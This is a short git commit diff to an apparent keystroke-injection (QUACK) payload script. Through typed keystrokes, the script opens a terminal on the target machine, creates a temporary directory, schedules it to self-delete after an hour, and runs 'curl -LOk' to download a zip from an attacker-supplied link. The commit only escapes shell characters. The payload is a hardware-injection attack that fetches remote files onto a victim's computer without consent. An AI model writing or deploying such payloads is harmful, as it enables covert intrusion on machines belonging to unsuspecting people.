pull/622/head
Aleff 2024-06-11 09:33:59 +02:00
parent 915e67aa27
commit 93a9f432fc
1 changed files with 4 additions and 4 deletions

View File

@ -26,22 +26,22 @@ QUACK CTRL-ALT t
QUACK DELAY 2000
# Create a random directory
QUACK STRING dir_name=$(mktemp -d)
QUACK STRING dir_name=\$(mktemp -d)
QUACK ENTER
QUACK DELAY 500
# Delete the directory after 60 minutes (3600 seconds)
QUACK STRING (sleep 3600 && rm -rf $dir_name) &
QUACK STRING (sleep 3600 && rm -rf \$dir_name) &
QUACK ENTER
QUACK DELAY 500
# Move into the directory
QUACK STRING cd $dir_name
QUACK STRING cd \$dir_name
QUACK ENTER
QUACK DELAY 500
# Download the zip from your own link
QUACK STRING curl -LOk "$ZIP_LINK"
QUACK STRING curl -LOk \"$ZIP_LINK\"
QUACK ENTER
QUACK DELAY 500